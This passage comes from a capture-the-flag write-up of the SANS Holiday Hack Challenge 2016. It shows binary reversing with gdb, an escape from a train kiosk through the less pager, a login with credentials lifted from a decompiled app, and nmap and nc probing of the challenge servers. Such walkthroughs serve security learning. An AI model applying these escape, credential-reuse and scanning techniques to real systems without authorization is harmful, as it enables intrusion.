&lt;span class="go"&gt;|           0x00402852      e859e2ffff     call sym.imp.puts          ; int puts(const char *s);&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402857      488b45f8       mov rax, qword [rbp - local_8h]&lt;/span&gt;
&lt;span class="go"&gt;|           0x0040285b      4889c7         mov rdi, rax&lt;/span&gt;
&lt;span class="go"&gt;|           0x0040285e      e84de2ffff     call sym.imp.puts          ; int puts(const char *s);&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402863      90             nop&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402864      c9             leave&lt;/span&gt;
&lt;span class="go"&gt;\           0x00402865      c3             ret&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Instead of trying to statically analyze this function, we can use &lt;code&gt;gdb&lt;/code&gt;
to directly jump to it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; gdb ./wumpus
&lt;span class="go"&gt;GNU gdb (Debian 7.7.1+dfsg-5) 7.7.1&lt;/span&gt;
&lt;span class="go"&gt;Copyright (C) 2014 Free Software Foundation, Inc.&lt;/span&gt;
&lt;span class="go"&gt;License GPLv3+: GNU GPL version 3 or later &amp;lt;http://gnu.org/licenses/gpl.html&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;This is free software: you are free to change and redistribute it.&lt;/span&gt;
&lt;span class="go"&gt;There is NO WARRANTY, to the extent permitted by law.  Type &amp;quot;show copying&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;and &amp;quot;show warranty&amp;quot; for details.&lt;/span&gt;
&lt;span class="go"&gt;This GDB was configured as &amp;quot;x86_64-linux-gnu&amp;quot;.&lt;/span&gt;
&lt;span class="go"&gt;Type &amp;quot;show configuration&amp;quot; for configuration details.&lt;/span&gt;
&lt;span class="go"&gt;For bug reporting instructions, please see:&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;http://www.gnu.org/software/gdb/bugs/&amp;gt;.&lt;/span&gt;
&lt;span class="go"&gt;Find the GDB manual and other documentation resources online at:&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;http://www.gnu.org/software/gdb/documentation/&amp;gt;.&lt;/span&gt;
&lt;span class="go"&gt;For help, type &amp;quot;help&amp;quot;.&lt;/span&gt;
&lt;span class="go"&gt;Type &amp;quot;apropos word&amp;quot; to search for commands related to &amp;quot;word&amp;quot;...&lt;/span&gt;
&lt;span class="go"&gt;Reading symbols from ./wumpus...(no debugging symbols found)...done.&lt;/span&gt;
&lt;span class="go"&gt;(gdb) r&lt;/span&gt;
&lt;span class="go"&gt;Starting program: ./wumpus&lt;/span&gt;
&lt;span class="go"&gt;Instructions? (y-n) ^Z&lt;/span&gt;
&lt;span class="go"&gt;Program received signal SIGTSTP, Stopped (user).&lt;/span&gt;
&lt;span class="go"&gt;0x00007ffff7b0cba0 in __read_nocancel () at ../sysdeps/unix/syscall-template.S:81&lt;/span&gt;
&lt;span class="go"&gt;81  ../sysdeps/unix/syscall-template.S: Aucun fichier ou dossier de ce type.&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;(gdb) j kill_wump&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;Continuing at 0x402648.&lt;/span&gt;
&lt;span class="go"&gt;*thwock!* *groan* *crash*&lt;/span&gt;

&lt;span class="go"&gt;A horrible roar fills the cave, and you realize, with a smile, that you&lt;/span&gt;
&lt;span class="go"&gt;have slain the evil Wumpus and won the game!  You don&amp;#39;t want to tarry for&lt;/span&gt;
&lt;span class="go"&gt;long, however, because not only is the Wumpus famous, but the stench of&lt;/span&gt;
&lt;span class="go"&gt;dead Wumpus is also quite well known, a stench plenty enough to slay the&lt;/span&gt;
&lt;span class="go"&gt;mightiest adventurer at a single whiff!!&lt;/span&gt;

&lt;span class="go"&gt;Passphrase:&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;WUMPUS IS MISUNDERSTOOD&lt;/span&gt;
&lt;/span&gt;
&lt;span class="go"&gt;Program received signal SIGSEGV, Segmentation fault.&lt;/span&gt;
&lt;span class="go"&gt;0x00007ffff7ff5000 in ?? ()&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;If you &lt;cite&gt;reaaaaally&lt;/cite&gt; want to do it by hand, here's a short explanation (statical
analysis and disassembly are not my strong suits):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;[...]&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402656      bf18000000     mov edi, 0x18               ; &amp;quot;0.@&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;|           0x0040265b      e8f0e4ffff     call sym.imp.malloc        ;  void *malloc(size_t size);&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402660      488945f8       mov qword [rbp - local_8h], rax&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402664      488b05cd2a20.  mov rax, qword [obj.m4]     ; [0x605138:8]=0x402a08 str.When_you_want_to_know_how_things_really_work__study_them_when_they_re_coming_apart LEA obj.m4 ; obj.m4&lt;/span&gt;
&lt;span class="go"&gt;|           0x0040266b      0fb65009       movzx edx, byte [rax + 9]   ; [0x9:1]=0&lt;/span&gt;
&lt;span class="go"&gt;|           0x0040266f      488b45f8       mov rax, qword [rbp - local_8h]&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402673      8810           mov byte [rax], dl&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402675      488b45f8       mov rax, qword [rbp - local_8h]&lt;/span&gt;
&lt;span class="go"&gt;[...]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Before the passphrase is printed, we can see that the program allocates memory
for a buffer, with a call so &lt;code&gt;sym.imp.malloc&lt;/code&gt;. The size of the buffer is
&lt;code&gt;0x18&lt;/code&gt; bytes, which is exactly the size of our final passphrase, plus
one, for the NULL byte (&lt;strong&gt;wink, wink&lt;/strong&gt;). So, our final passphrase will be
constructed and put into a final buffer.&lt;/p&gt;
&lt;p&gt;Then, we can see that several strings are used to compute our final passphrase.
The first one is:&lt;/p&gt;
&lt;blockquote&gt;
When you &lt;strong&gt;w&lt;/strong&gt;ant to know how things really work, study them when
they're coming apart&lt;/blockquote&gt;
&lt;p&gt;The pointer to this string is put into the &lt;code&gt;rax&lt;/code&gt; register. The byte
situated at &lt;code&gt;rax + 9&lt;/code&gt; is then put into the &lt;code&gt;edx&lt;/code&gt; register. If we
take our string, and get the 9th character (starting counting from 0), we get
the &lt;code&gt;w&lt;/code&gt; from &lt;code&gt;want&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;This character is then moved to the &lt;code&gt;local_8h&lt;/code&gt; variable. We now have a
&lt;code&gt;local_8h&lt;/code&gt; variable, starting with &lt;code&gt;w&lt;/code&gt;. Incidently, it's the first
character of our final passphrase (see where this is going?).&lt;/p&gt;
&lt;p&gt;We then move on to the second character, using the following string:&lt;/p&gt;
&lt;blockquote&gt;
We have no fut&lt;strong&gt;u&lt;/strong&gt;re because our present is too volatile. We have
only risk management.&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;[...]&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402679      488d5001       lea rdx, [rax + 1]          ; 0x1&lt;/span&gt;
&lt;span class="go"&gt;|           0x0040267d      488b05bc2a20.  mov rax, qword [obj.m5]     ; [0x605140:8]=0x402a60 str.We_have_no_future_because_our_present_is_too_volatile._We_have_only_risk_management. LEA obj.m5 ; &amp;quot;`*@&amp;quot; @ 0x605140&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402684      0fb6400e       movzx eax, byte [rax + 0xe] ; [0xe:1]=0&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402688      8802           mov byte [rdx], al&lt;/span&gt;
&lt;span class="go"&gt;|           0x0040268a      488b45f8       mov rax, qword [rbp - local_8h]&lt;/span&gt;
&lt;span class="go"&gt;[...]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We see that the byte situated at &lt;code&gt;rax + 0xe&lt;/code&gt;, which is the second
&lt;code&gt;u&lt;/code&gt; in &lt;code&gt;future&lt;/code&gt;, is stored in &lt;code&gt;edx&lt;/code&gt;. This character is then
moved to &lt;code&gt;local_8h + 1&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Our &lt;code&gt;local_8h&lt;/code&gt; now begins with &lt;code&gt;wu&lt;/code&gt;. We do this for the rest of the
strings, and we finally get &lt;code&gt;wumpus is misunderstood&lt;/code&gt;, before the call to
the &lt;code&gt;sym.to_upper&lt;/code&gt; function, giving us the final passphrase.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;[...]&lt;/span&gt;
&lt;span class="go"&gt;|           0x0040283b      0fb64004       movzx eax, byte [rax + 4]   ; [0x4:1]=2&lt;/span&gt;
&lt;span class="go"&gt;|           0x0040283f      8802           mov byte [rdx], al&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402841      488b45f8       mov rax, qword [rbp - local_8h]&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402845      4889c7         mov rdi, rax&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;|           0x00402848      e861f6ffff     call sym.to_upper&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;|           0x0040284d      bf9f364000     mov edi, str._nPassphrase:  ; str._nPassphrase:&lt;/span&gt;
&lt;span class="go"&gt;|           0x00402852      e859e2ffff     call sym.imp.puts          ; int puts(const char *s);&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;|           0x00402857      488b45f8       mov rax, qword [rbp - local_8h]&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="go"&gt;|           0x0040285b      4889c7         mov rdi, rax&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="go"&gt;|           0x0040285e      e84de2ffff     call sym.imp.puts          ; int puts(const char *s);&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;[...]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Passphrase: &lt;code&gt;WUMPUS IS MISUNDERSTOOD&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;This passphrase gives you an access to a room called DFER, where there's no
terminal.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="train-station"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id9"&gt;Train station&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;You're given access to a kiosk menu to control the train:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
Train Management Console: AUTHORIZED USERS ONLY
                ==== MAIN MENU ====
STATUS:                         Train Status
BRAKEON:                        Set Brakes
BRAKEOFF:                       Release Brakes
START:                          Start Train
HELP:                           Open the help document
QUIT:                           Exit console
menu:main&amp;gt;
&lt;/pre&gt;
&lt;p&gt;If you want to start the train, you must release the brakes, and know the
correct passphrase:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
                ==== MAIN MENU ====
STATUS:                         Train Status
BRAKEON:                        Set Brakes
BRAKEOFF:                       Release Brakes
START:                          Start Train
HELP:                           Open the help document
QUIT:                           Exit console
menu:main&amp;gt; BRAKEOFF
*******CAUTION*******
The brake has been released!
*******CAUTION*******
off
                ==== MAIN MENU ====
STATUS:                         Train Status
BRAKEON:                        Set Brakes
BRAKEOFF:                       Release Brakes
START:                          Start Train
HELP:                           Open the help document
QUIT:                           Exit console
menu:main&amp;gt; START
Checking brakes....
Enter Password:
&lt;/pre&gt;
&lt;p&gt;Let's see how we can find this password.&lt;/p&gt;
&lt;p&gt;If you take a look at the &lt;code&gt;HELP&lt;/code&gt; function, you can see that it's opening
a help file. The clue in the description of the &lt;code&gt;HELP&lt;/code&gt; function
(&amp;quot;un&lt;strong&gt;LESS&lt;/strong&gt; you know something I don't&amp;quot;), plus the name of the file at the
bottom of the screen, is a strong indicator that the menu is using the
&lt;code&gt;less&lt;/code&gt; command to open the help file:&lt;/p&gt;
&lt;img alt="help_command.png" class="align-center" src="/images/sans-christmas-challenge-2016/help_command.png" /&gt;
&lt;p&gt;By using the &lt;code&gt;:e&lt;/code&gt; command, we can examine another file than the one open.
By using tabulation auto-complete, we can see the name of the script used to
display the kiosk menu, &lt;code&gt;Train_Console&lt;/code&gt;:&lt;/p&gt;
&lt;img alt="help_command_exploit.png" class="align-center" src="/images/sans-christmas-challenge-2016/help_command_exploit.png" /&gt;
&lt;img alt="help_command_exploit_train_console_script.png" class="align-center" src="/images/sans-christmas-challenge-2016/help_command_train_console_script.png" /&gt;
&lt;p&gt;Passphrase: &lt;code&gt;24fb3e89ce2aa0ea422c3d511d40dd84&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;By starting the train, we can see that we can travel to the past, in 1978!&lt;/p&gt;
&lt;img alt="train_back_to_the_future.png" class="align-center" src="/images/sans-christmas-challenge-2016/train_back_to_the_future.png" /&gt;
&lt;p&gt;We then arrive in the North Pole, but in 1978:&lt;/p&gt;
&lt;img alt="north_pole_1978.png" class="align-center" src="/images/sans-christmas-challenge-2016/north_pole_1978.png" /&gt;
&lt;p&gt;We can go, in 1978, into every room that we unlocked in 2016. By doing so, we
find Santa in the DFER (&amp;quot;Dungeon For Errant Reindeer&amp;quot;) room:&lt;/p&gt;
&lt;img alt="found_santa.png" class="align-center" src="/images/sans-christmas-challenge-2016/found_santa.png" /&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="part-4-my-gosh-it-s-full-of-holes"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id10"&gt;Part 4: My Gosh... It's Full of Holes&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Well, we've found Santa, Christmas is saved, hurray! But the abductor is still
roaming free. And since Santa is suffering from short-term memory loss because
of the fight, he doesn't remember who attacked him. So, who is behind Santa's
attack, and where can we find them? By taking a look at the SantaGram
application, we may find some interesting informations.&lt;/p&gt;
&lt;p&gt;We're looking for servers the SantaGram application interacts with. By looking
at the resource file in the decompiled APK, we can find several URLs:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
0x7f070015 (2131165205) = string.analytics_launch_url: https://analytics.northpolewonderland.com/report.php?type=launch
0x7f070016 (2131165206) = string.analytics_usage_url: https://analytics.northpolewonderland.com/report.php?type=usage
[...]
0x7f07001a (2131165210) = string.banner_ad_url: http://ads.northpolewonderland.com/affiliate/C9E380C8-2244-41E3-93A3-D6C6700156A5
[...]
0x7f07001d (2131165213) = string.debug_data_collection_url: http://dev.northpolewonderland.com/index.php
[...]
0x7f07001f (2131165215) = string.dungeon_url: http://dungeon.northpolewonderland.com/
0x7f070020 (2131165216) = string.exhandler_url: http://ex.northpolewonderland.com/exception.php
&lt;/pre&gt;
&lt;p&gt;This gives us a total of five servers to target:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;analytics.northpolewonderland.com&lt;/li&gt;
&lt;li&gt;ads.northpolewonderland.com&lt;/li&gt;
&lt;li&gt;dev.northpolewonderland.com&lt;/li&gt;
&lt;li&gt;dungeon.northpolewonderland.com&lt;/li&gt;
&lt;li&gt;ex.northpolewonderland.com&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We can confirm with the Great and Powerful Oracle, Tom Hessman, that these are
indeed, the servers to target:&lt;/p&gt;
&lt;img alt="tom_hessman.png" class="align-center" src="/images/sans-christmas-challenge-2016/tom_hessman.png" /&gt;
&lt;p&gt;Alright, let the hacking begin!&lt;/p&gt;
&lt;div class="section" id="the-mobile-analytics-server-via-credentialed-login-access"&gt;
&lt;h3&gt;&lt;a class="reference external" href="https://analytics.northpolewonderland.com/"&gt;The Mobile Analytics Server (via credentialed login access)&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;For the first part of this server, you only need to log in with the credentials
found in the decompiled APK, &lt;code&gt;guess/busyreindeer78&lt;/code&gt;. Once you're
connected, you can download the wanted audio file:&lt;/p&gt;
&lt;img alt="first_audio_file.png" class="align-center" src="/images/sans-christmas-challenge-2016/first_audio_file.png" /&gt;
&lt;/div&gt;
&lt;div class="section" id="the-dungeon-game"&gt;
&lt;h3&gt;&lt;a class="reference external" href="http://dungeon.northpolewonderland.com/"&gt;The Dungeon Game&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;The web server of the Dungeon game gives us instructions on how to play. A
mischievous Elf is said to trade secrets for gifts. If we give him a gift, he
may help us find the villain!&lt;/p&gt;
&lt;p&gt;However, we can't seem to start a party on the web page. Similarly as last
year, and since an elf in the North Pole hints to do so, I suspected there was
another open port, on which we could connect to play the Dungeon game:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; nmap dungeon.northpolewonderland.com

&lt;span class="go"&gt;Starting Nmap 6.47 ( http://nmap.org ) at 2016-12-29 21:58 CET&lt;/span&gt;
&lt;span class="go"&gt;Nmap scan report for dungeon.northpolewonderland.com (35.184.47.139)&lt;/span&gt;
&lt;span class="go"&gt;Host is up (0.12s latency).&lt;/span&gt;
&lt;span class="go"&gt;rDNS record for 35.184.47.139: 139.47.184.35.bc.googleusercontent.com&lt;/span&gt;
&lt;span class="go"&gt;Not shown: 994 closed ports&lt;/span&gt;
&lt;span class="go"&gt;PORT      STATE    SERVICE&lt;/span&gt;
&lt;span class="go"&gt;22/tcp    open     ssh&lt;/span&gt;
&lt;span class="go"&gt;80/tcp    open     http&lt;/span&gt;
&lt;span class="go"&gt;135/tcp   filtered msrpc&lt;/span&gt;
&lt;span class="go"&gt;139/tcp   filtered netbios-ssn&lt;/span&gt;
&lt;span class="go"&gt;445/tcp   filtered microsoft-ds&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;11111/tcp open     vce&lt;/span&gt;
&lt;/span&gt;
&lt;span class="go"&gt;Nmap done: 1 IP address (1 host up) scanned in 16.09 seconds&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The last port is not a standard one, let's connect to it with &lt;code&gt;nc&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; nc dungeon.northpolewonderland.com &lt;span class="m"&gt;11111&lt;/span&gt;
&lt;span class="go"&gt;Welcome to Dungeon.         This version created 11-MAR-78.&lt;/span&gt;
&lt;span class="go"&gt;You are in an open field west of a big white house with a boarded&lt;/span&gt;
&lt;span class="go"&gt;front door.&lt;/span&gt;
&lt;span class="go"&gt;There is a small wrapped mailbox here.&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;As suspected, it's an interface to the Dungeon game. That's when I decided to
brush up a little bit on it (instead of just posting a link to the Wikipedia
article as I did in Part 1). It's a text-based RPG, inspired by Dungeons and
Dragons. It's apparently strongly tied to the famous &lt;a class="reference external" href="https://en.wikipedia.org/wiki/Zork"&gt;Zork&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;So I started searching for &lt;cite&gt;*cough cough*&lt;/cite&gt; write-through of Zork and found
&lt;a class="reference external" href="http://www.lacegem.com/solutions/zork1.html"&gt;this one&lt;/a&gt;. It's not really
necessary, but it gave me the idea to go up the chimney.&lt;/p&gt;
&lt;p&gt;Anyway, here's how to get the wanted information:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;Welcome to Dungeon.         This version created 11-MAR-78.
You are in an open field west of a big white house with a boarded
front door.
There is a small wrapped mailbox here.
&lt;span class="hll"&gt;&amp;gt;south
&lt;/span&gt;You are facing the south side of a white house.  There is no door here,
and all the windows are barred.
&lt;span class="hll"&gt;&amp;gt;east
&lt;/span&gt;You are behind the white house.  In one corner of the house
there is a window which is slightly ajar.
&lt;span class="hll"&gt;&amp;gt;open window
&lt;/span&gt;With great effort, you open the window far enough to allow passage.
&lt;span class="hll"&gt;&amp;gt;go in
&lt;/span&gt;You are in the kitchen of the white house.  A table seems to have
been used recently for the preparation of food.  A passage leads to
the west, and a dark staircase can be seen leading upward.  To the
east is a small window which is open.
On the table is an elongated brown sack, smelling of hot peppers.
A clear glass bottle is here.
The glass bottle contains:
  A quantity of water.
&lt;span class="hll"&gt;&amp;gt;west
&lt;/span&gt;You are in the living room.  There is a door to the east.  To the west
is a wooden door with strange gothic lettering, which appears to be
nailed shut.
In the center of the room is a large oriental rug.
There is a trophy case here.
On hooks above the mantlepiece hangs an elvish sword of great antiquity.
A battery-powered brass lantern is on the trophy case.
There is an issue of US NEWS &amp;amp; DUNGEON REPORT dated 11-MAR-78 here.
&lt;span class="hll"&gt;&amp;gt;take lantern
&lt;/span&gt;Taken.
&lt;span class="hll"&gt;&amp;gt;turn lantern on
&lt;/span&gt;The lamp is now on.
&lt;span class="hll"&gt;&amp;gt;move rug
&lt;/span&gt;With a great effort, the rug is moved to one side of the room.
With the rug moved, the dusty cover of a closed trap door appears.
&lt;span class="hll"&gt;&amp;gt;open trap door
&lt;/span&gt;The door reluctantly opens to reveal a rickety staircase descending
into darkness.
&lt;span class="hll"&gt;&amp;gt;go down
&lt;/span&gt;You are in a dark and damp cellar with a narrow passageway leading
east, and a crawlway to the south.  To the west is the bottom of a
steep metal ramp which is unclimbable.
The door crashes shut, and you hear someone barring it.
&lt;span class="hll"&gt;&amp;gt;south
&lt;/span&gt;You are on the west edge of a chasm, the bottom of which cannot be
seen.  The east side is sheer rock, providing no exits.  A narrow
passage goes west.  The path you are on continues to the north and south.
&lt;span class="hll"&gt;&amp;gt;south
&lt;/span&gt;You are in an art gallery.  Most of the paintings which were here
have been stolen by vandals with exceptional taste.  The vandals
left through the north, south, or west exits.
Fortunately, there is still one chance for you to be a vandal, for on
the far wall is a work of unparalleled beauty.
&lt;span class="hll"&gt;&amp;gt;take painting
&lt;/span&gt;Taken.
&lt;span class="hll"&gt;&amp;gt;south
&lt;/span&gt;You are in what appears to have been an artist&amp;#39;s studio.  The walls
and floors are splattered with paints of 69 different colors.
Strangely enough, nothing of value is hanging here.  At the north and
northwest of the room are open doors (also covered with paint).  An
extremely dark and narrow chimney leads up from a fireplace.  Although
you might be able to get up the chimney, it seems unlikely that you
could get back down.
&lt;span class="hll"&gt;&amp;gt;go up
&lt;/span&gt;You have mysteriously reached the North Pole.
In the distance you detect the busy sounds of Santa&amp;#39;s elves in full
production.

You are in a warm room, lit by both the fireplace but also the glow of
centuries old trophies.
On the wall is a sign:
        Songs of the seasons are in many parts
        To solve a puzzle is in our hearts
        Ask not what what the answer be,
        Without a trinket to satisfy me.
The elf is facing you keeping his back warmed by the fire.
&lt;span class="hll"&gt;&amp;gt;give painting to elf
&lt;/span&gt;The elf, satisified with the trade says -
&lt;span class="hll"&gt;send email to &amp;quot;peppermint@northpolewonderland.com&amp;quot; for that which you seek.
&lt;/span&gt;The elf says - you have conquered this challenge - the game will now end.
Your score is 89 [total of 585 points], in 16 moves.
This gives you the rank of Novice Adventurer.
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We're given instructions to send a mail to &lt;a class="reference external" href="mailto:peppermint&amp;#64;northpolewonderland.com"&gt;peppermint&amp;#64;northpolewonderland.com&lt;/a&gt;
to receive the information we seek. After sending an email, we get an answer:&lt;/p&gt;
&lt;img alt="dungeon_audio_file.png" class="align-center" src="/images/sans-christmas-challenge-2016/dungeon_audio_file.png" /&gt;
&lt;p&gt;We now have our third weird audio file.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="the-debug-server"&gt;
&lt;h3&gt;&lt;a class="reference external" href="http://dev.northpolewonderland.com/index.php"&gt;The Debug Server&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;If we look at the decompiled source code of the SantaGram application, we can
see that the debug server is called when a user modifies their own profile:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="c1"&gt;// File com/northpolewonderland/santagram/EditProfile.java&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="n"&gt;getString&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="n"&gt;R&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;string&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;debug_data_enabled&lt;/span&gt;&lt;span class="o"&gt;).&lt;/span&gt;&lt;span class="na"&gt;equals&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;true&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;))&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;
&lt;/span&gt;    &lt;span class="n"&gt;Log&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;i&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="n"&gt;getString&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="n"&gt;R&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;string&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;TAG&lt;/span&gt;&lt;span class="o"&gt;),&lt;/span&gt; &lt;span class="s"&gt;&amp;quot;Remote debug logging is Enabled&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;);&lt;/span&gt;
&lt;span class="hll"&gt;    &lt;span class="n"&gt;z&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="o"&gt;;&lt;/span&gt;
&lt;/span&gt;&lt;span class="o"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;Log&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;i&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="n"&gt;getString&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="n"&gt;R&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;string&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;TAG&lt;/span&gt;&lt;span class="o"&gt;),&lt;/span&gt; &lt;span class="s"&gt;&amp;quot;Remote debug logging is Disabled&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;z&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;&lt;span class="o"&gt;;&lt;/span&gt;
&lt;span class="o"&gt;}&lt;/span&gt;
&lt;span class="o"&gt;[...]&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="n"&gt;z&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;
&lt;/span&gt;    &lt;span class="k"&gt;try&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;
        &lt;span class="kd"&gt;final&lt;/span&gt; &lt;span class="n"&gt;JSONObject&lt;/span&gt; &lt;span class="n"&gt;jSONObject&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="n"&gt;JSONObject&lt;/span&gt;&lt;span class="o"&gt;();&lt;/span&gt;
        &lt;span class="n"&gt;jSONObject&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;put&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;date&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="n"&gt;SimpleDateFormat&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;yyyyMMddHHmmssZ&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;).&lt;/span&gt;&lt;span class="na"&gt;format&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="n"&gt;Calendar&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;getInstance&lt;/span&gt;&lt;span class="o"&gt;().&lt;/span&gt;&lt;span class="na"&gt;getTime&lt;/span&gt;&lt;span class="o"&gt;()));&lt;/span&gt;
